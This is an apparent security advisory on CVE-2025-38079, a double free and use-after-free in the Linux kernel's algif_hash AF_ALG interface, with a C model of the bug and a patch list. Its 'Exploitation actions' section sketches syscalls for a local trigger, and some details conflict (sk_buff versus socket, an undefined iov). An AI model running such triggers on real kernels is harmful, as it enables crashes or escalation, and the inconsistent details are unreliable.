Linux Kernel: crypto algif_hash double free leading to use-after-free (CVE-2025-38079)
Summary
In today’s episode, we discuss CVE-2025-38079, a double-free and use-after-free vulnerability in the Linux kernel’s algif_hash crypto interface. SUSE has released security updates to address this flaw, which could be triggered by a crafted call to accept(2) with MSG_MORE on an algif_hash socket.
Product details
This issue affects the Linux kernel in SUSE distributions built from versions starting at commit fe869cdb89c9 up to but not including the fixed commits (e.g., f0f3d09f5353 and onward). SUSE has issued patches for all supported kernel branches, including patch releases for versions 2.6.38 and later.
Vulnerability type summary
CVE-2025-38079 is a memory-corruption bug caused by double freeing an sk_buff object. The root cause is a double free that leads to a slab-use-after-free, which can result in a kernel crash or potentially allow an attacker to corrupt kernel memory and escalate privileges.
Details of the vulnerability
When accept(2) is invoked on an AF_ALG socket of type algif_hash with the MSG_MORE flag set, the code path in crypto_ahash_import may fail and free the sk2 socket buffer. Later, af_alg_release also frees sk2 unconditionally. This second free on already-freed memory triggers a slab-use-after-free error. An unprivileged local user could exploit this to crash the kernel or manipulate memory.
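A simplified user-space model of the ownership error described above, added here as an illustration and not taken from the kernel source or the SUSE advisory. The names model_sock, model_sock_put, model_import, accept_vulnerable, accept_hardened and uaf_hits_after_accept are hypothetical, and the hardened variant assumes the release path is the only place that frees sk2.

```c
#include <stdio.h>
/* Simplified user-space model of the ownership bug; not kernel code. */
struct model_sock {
    int refcnt;   /* references still held on the object */
    int freed;    /* set once the object is returned to the allocator */
    int uaf_hits; /* accesses made after the free (what the slab-use-after-free report flags) */
};

/* Drop one reference; the last put frees the object. */
static void model_sock_put(struct model_sock *sk)
{
    if (sk->freed)
        sk->uaf_hits++; /* a second put touches memory that is already freed */
    else if (--sk->refcnt == 0)
        sk->freed = 1;
}

/* Stand-in for crypto_ahash_import(); `fail` forces the error path. */
static int model_import(int fail) { return fail ? -1 : 0; }

/* Accept path as described above: frees sk2 itself when the import fails. */
static int accept_vulnerable(struct model_sock *sk2, int fail)
{
    int err = model_import(fail);
    if (err)
        model_sock_put(sk2);
    return err;
}

/* Hardened variant (assumption): report the error, leave cleanup to release. */
static int accept_hardened(struct model_sock *sk2, int fail)
{
    (void)sk2;
    return model_import(fail);
}

/* Run accept, then the unconditional put that stands in for af_alg_release(). */
int uaf_hits_after_accept(int hardened, int fail)
{
    struct model_sock sk2 = { .refcnt = 1 };
    (void)(hardened ? accept_hardened(&sk2, fail) : accept_vulnerable(&sk2, fail));
    model_sock_put(&sk2);
    return sk2.freed ? sk2.uaf_hits : -1; /* -1 would mean the object leaked */
}

int main(void)
{
    printf("vulnerable=%d hardened=%d\n", uaf_hits_after_accept(0, 1), uaf_hits_after_accept(1, 1));
    return 0;
}
```

The model counts the second put instead of performing it, so it runs without corrupting memory; in both variants the object is freed exactly once when the import succeeds.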
Conclusion
SUSE users should update their Linux kernels immediately to the patched versions provided in today’s security advisory. Applying the official SUSE kernel update will eliminate the double-free defect and protect systems from potential denial-of-service or kernel-memory corruption attacks.
Remediation and exploitation details
This chain involves the following actors
- Local unprivileged user: Attacker
The following systems are involved
- Linux Kernel crypto subsystem (Handles cryptographic hashing requests on AF_ALG sockets): Victim
Attack entry point
- AF_ALG hash_accept path: Calling accept(2) on a hash socket with the MSG_MORE flag set triggers the vulnerable code path
Remediation actions
Exploitation actions
Initialize a hashing socket
- int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
Prepare the socket for accept
- struct sockaddr_alg sa = { .sa_family = AF_ALG, .sa_type = "hash", .sa_name = "sha256" };
- bind(s, (struct sockaddr *)&sa, sizeof(sa));
- listen(s, 1);
Trigger double free and use-after-free in hash_accept
- struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1 };
- sendmsg(s, &msg, MSG_MORE);
- int c = accept(s, NULL, NULL);
Cause a slab-use-after-free and crash
- dmesg | grep -i "slab-use-after-free"
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://git.kernel.org/stable/c/5bff312b59b3f2a54ff504e4f4e47272b64f3633
- https://git.kernel.org/stable/c/bf7bba75b91539e93615f560893a599c1e1c98bf
- https://git.kernel.org/stable/c/c3059d58f79fdfb2201249c2741514e34562b547
- https://git.kernel.org/stable/c/f0f3d09f53534ea385d55ced408f2b67059b16e4
- https://git.kernel.org/stable/c/134daaba93193df9e988524b5cd2f52d15eb1993
- https://git.kernel.org/stable/c/2f45a8d64fb4ed4830a4b3273834ecd6ca504896
- https://git.kernel.org/stable/c/0346f4b742345d1c733c977f3a7aef5a6419a967
- https://git.kernel.org/stable/c/b2df03ed4052e97126267e8c13ad4204ea6ba9b6
- [2025-08-20] SUSE releases important Linux Kernel patch for vulnerabilities CVE-2025-38079 and others.
- [2025-08-20] SUSE releases important Linux Kernel updates to address security vulnerabilities CVE-2025-38079 and CVE-2025-38083.
- [2025-08-21] SUSE releases a key security update for the Linux Kernel addressing CVE-2025-38079 DoS vulnerability.
- [2025-08-21] SUSE releases an important security fix for the Linux Kernel addressing CVE-2025-38079.